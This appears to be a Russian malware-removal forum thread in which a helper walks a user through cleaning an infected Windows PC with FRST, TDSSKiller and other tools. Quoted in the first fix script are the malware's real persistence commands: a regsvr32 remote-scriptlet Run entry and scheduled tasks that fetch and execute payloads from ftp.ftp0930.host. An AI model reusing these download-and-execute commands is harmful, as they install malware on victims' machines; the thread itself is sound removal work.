mike 1 1 093 Опубликовано 3 декабря, 2018 Share Опубликовано 3 декабря, 2018 Я отвечаю когда у меня есть свободное время и обычно после основной работы. Пожалуйста, наберитесь терпения и подождите. ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус, файрволл и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp0930.host:280/v.sct scrobj.dll HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{223d6bfe-bd0e-4da1-9128-a6c57942e271} <==== ATTENTION (Restriction - IP) C:\Users\TES_EidEnuard\AppData\Local\iYmPYkeVYOOIF.exe 2018-12-02 09:01 - 2018-12-02 09:01 - 000000081 _____ C:\Windows\system32\s 2018-12-02 09:01 - 2018-12-02 09:01 - 000000079 _____ C:\Windows\system32\ps 2018-12-02 09:01 - 2018-12-02 09:01 - 000000077 _____ C:\Windows\system32\p 2018-12-02 08:50 - 2018-12-02 09:06 - 000003186 _____ C:\Windows\System32\Tasks\ok 2018-12-02 08:50 - 2018-12-02 09:05 - 000003506 _____ C:\Windows\System32\Tasks\Mysa3 2018-12-02 08:49 - 2018-12-02 09:05 - 000003520 _____ C:\Windows\System32\Tasks\Mysa 2018-12-02 08:49 - 2018-12-02 09:05 - 000003426 _____ C:\Windows\System32\Tasks\Mysa2 2018-12-02 08:49 - 2018-12-02 09:05 - 000003190 _____ C:\Windows\System32\Tasks\Mysa1 2018-12-02 08:49 - 2018-12-02 08:49 - 015038553 _____ C:\Windows\SysWOW64\Drivers\64.exe 2018-12-02 08:27 - 2018-12-02 09:05 - 000000084 _____ C:\Program Files\Common Files\xp.dat 2018-12-02 08:26 - 2018-12-02 09:03 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat Task: {227FBB57-78B1-4869-B861-ED46D4D66686} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {25883FC8-B6F7-46DD-ABC7-405B7B2855A9} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {9EA65489-F2E2-43A5-91B0-45BBDC7B8BEB} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {BA583DF3-86E7-4FDE-AB25-C8CC81300242} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa Task: {DC85F829-099C-4A65-8A7A-774D77C4ABA7} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION EmptyTemp: Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Сделайте лог TDSSKiller, но утилиту скачайте отсюда https://box.kaspersky.com/d/6b26590a307e4ae78fe7/ . Самостоятельно ничего не удаляйте! Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 3 декабря, 2018 Автор Share Опубликовано 3 декабря, 2018 Файл фикслога. Скачал ТДСкиллер, но так и не понял. как в нём делать лог? Fixlog.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 3 декабря, 2018 Share Опубликовано 3 декабря, 2018 Запустите файл TDSSKiller.exe. Нажмите кнопку "Начать проверку". Не меняйте настройки сканирования по умолчанию. В процессе проверки могут быть обнаружены объекты двух типов: вредоносные (точно было установлено, какой вредоносной программой поражен объект); подозрительные (тип вредоносного воздействия точно установить невозможно). По окончании проверки утилита выводит список обнаруженных объектов с их подробным описанием. Для вредоносных объектов утилита автоматически определяет действие: Лечить или Удалить. Для подозрительных объектов утилита предоставляет выбор действия пользователю (по умолчанию Пропустить). Самостоятельно без указания консультанта ничего не удаляйте!!! После нажатия кнопки Продолжить утилита выполняет выбранные действия и выводит результат. Прикрепите лог утилиты к своему следующему сообщению По умолчанию утилита выводит отчет работы в корень системного диска (диска, на котором установлена операционная система, как правило, это диск С:\). Имя отчета имеет следующий вид: ИмяУтилиты.Версия_Дата_Время_log.txt Например, C:\TDSSKiller.2.4.7_23.07.2010_15.31.43_log.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 4 декабря, 2018 Автор Share Опубликовано 4 декабря, 2018 Получается, этот лог? TDSSKiller.3.1.0.20_03.12.2018_21.50.07_log.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 4 декабря, 2018 Share Опубликовано 4 декабря, 2018 21:51:02.0921 0x0460 Detected object count: 2 21:51:02.0921 0x0460 Actual detected object count: 2 21:51:35.0864 0x0460 System memory - cured 21:51:35.0864 0x0460 System memory ( MEM:Rootkit.Win64.DarkGalaxy.a ) - User select action: Cure 21:51:36.0306 0x0460 \Device\Harddisk0\DR0\# - copied to quarantine 21:51:36.0307 0x0460 \Device\Harddisk0\DR0 - copied to quarantine 21:51:36.0333 0x0460 \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - will be cured on reboot 21:51:36.0341 0x0460 \Device\Harddisk0\DR0 - ok 21:51:36.0341 0x0460 \Device\Harddisk0\DR0 ( Rootkit.Boot.DarkGalaxy.a ) - User select action: Cure 21:51:36.0416 0x0460 KLMD registered as C:\Windows\system32\drivers\81240689.sys 21:54:17.0546 0x084c Deinitialize success Этот, но какие-то действия к найденным зверькам я не просил применять, ну да ладно, основного зверька вывели. Новые логи FRST.txt, Addition.txt сделайте. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 4 декабря, 2018 Автор Share Опубликовано 4 декабря, 2018 Да я и не хотел удалять, как то на автомате нажал "продолжить", а потом только вспомнил. что данное действие запускает скрипт на выбор решения. Логи прикрепляю. Addition.txt FRST.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 4 декабря, 2018 Share Опубликовано 4 декабря, 2018 ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows! Временно выгрузите антивирус и прочее защитное ПО. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool: CreateRestorePoint: CloseProcesses: S3 Winmon; \??\C:\Windows\System32\drivers\Winmon.sys [X] S3 WinmonFS; \??\C:\Windows\System32\drivers\WinmonFS.sys [X] S1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X] 2018-11-24 11:36 - 2018-11-24 11:41 - 000000000 ____D C:\Program Files\Common Files\HIYOKC07A 2018-10-16 23:57 - 2018-10-16 23:57 - 000002497 _____ C:\Windows\cpu.txt 2018-10-16 19:55 - 2018-12-03 19:55 - 000027136 _____ (Microsoft Corporation) C:\Windows\system\down.exe Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении! Обратите внимание, что компьютер будет перезагружен. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму Скачайте Check Browsers' LNK и сохраните архив с утилитой на Рабочем столе Распакуйте архив с утилитой в отдельную папку Запустите Check Browsers LNK.exeОбратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите Да После окончания работы программы в папке Log будет сохранен отчет Check_Browsers_LNK.log Прикрепите этот отчет в вашей теме. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 4 декабря, 2018 Автор Share Опубликовано 4 декабря, 2018 (изменено) Прикрепляю Check_Browsers_LNK.log Fixlog.txt Изменено 4 декабря, 2018 пользователем Enuard Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 4 декабря, 2018 Share Опубликовано 4 декабря, 2018 Скачайте ClearLNK и сохраните архив с утилитой на рабочем столе. Распакуйте архив с утилитой в отдельную папку. Запустите ClearLnk и скопируйте в окно программы следующий текст: C:\Users\TES_EidEnuard\Desktop\Новая папка (8)\Gооglе Сhrоmе.lnk C:\Users\TES_EidEnuard\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Оpеrа.lnk C:\Users\TES_EidEnuard\Desktop\Новая папка (8)\Drаgоn Аgе Inquisitiоn.lnk Нажмите на кнопку "Лечить" и дождитесь окончания работы программы. Отчет о работе ClearLNK-<Дата>.log будет сохранен в папке LOG. Прикрепите этот отчет к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 4 декабря, 2018 Автор Share Опубликовано 4 декабря, 2018 прикрепляю ClearLNK-2018.12.04_23.05.50.log Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 4 декабря, 2018 Share Опубликовано 4 декабря, 2018 Думаю можно выписывать больного. Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 4 декабря, 2018 Автор Share Опубликовано 4 декабря, 2018 Спасибо большое, если найду что либо ещё - могу обращаться? Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 4 декабря, 2018 Share Опубликовано 4 декабря, 2018 Можете. Для профилактики и защиты от повторных заражений загрузите SecurityCheck by glax24 отсюда и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7) Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу. Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt; Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Прикрепите отчет в вашей теме Цитата Ссылка на сообщение Поделиться на другие сайты
Enuard 0 Опубликовано 4 декабря, 2018 Автор Share Опубликовано 4 декабря, 2018 прикрепил SecurityCheck.txt Цитата Ссылка на сообщение Поделиться на другие сайты
mike 1 1 093 Опубликовано 4 декабря, 2018 Share Опубликовано 4 декабря, 2018 Обновите: Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления ^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^ Автоматическое обновление отключено - включите Foxit Reader 6.1.1.1025 v.v 6.1.1.1025 Внимание! Скачать обновления ^Локализованные версии могут обновляться позже англоязычных!^ 7-Zip 9.30 (x64 edition) v.9.30.00.0 Внимание! Скачать обновления ^Удалите старую версию, скачайте и установите новую.^ NVIDIA GeForce Experience 3.5.0.70 v.3.5.0.70 Внимание! Скачать обновления --------------------------------- [ IM ] ---------------------------------- Skype™ 7.40 v.7.40.104 Внимание! Скачать обновления -------------------------------- [ Java ] --------------------------------- Java 8 Update 71 v.8.0.710.15 Внимание! Скачать обновления ^Удалите старую версию и установите новую (jre-8u192-windows-i586.exe)^ --------------------------- [ AdobeProduction ] --------------------------- Adobe Flash Player 11 ActiveX & Plugin 64-bit v.11.9.900.152 Внимание! Скачать обновления ^Удалите старую версию и установите новые Flash Player ActiveX и Flash Player Plugin^ Adobe Shockwave Player + Authorware Web Player v.v12.0.6.147 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Shockwave Player. ------------------------------- [ Browser ] ------------------------------- Yandex v.16.7.0.3342 Внимание! Скачать обновления ^Проверьте обновления через меню Дополнительно - О браузере Yandex!^ Далее создайте точку восстановления. Для удаления утилит, которые использовались в лечении скачайте DelFix и сохраните утилиту на Рабочем столе Запустите DelFixОбратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите Да В открывшемся окне программы поставьте галочки напротив пунктов Remove desinfection tools и Create registry backup Нажмите на кнопку Run Прикрепите отчет delfix.txt Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.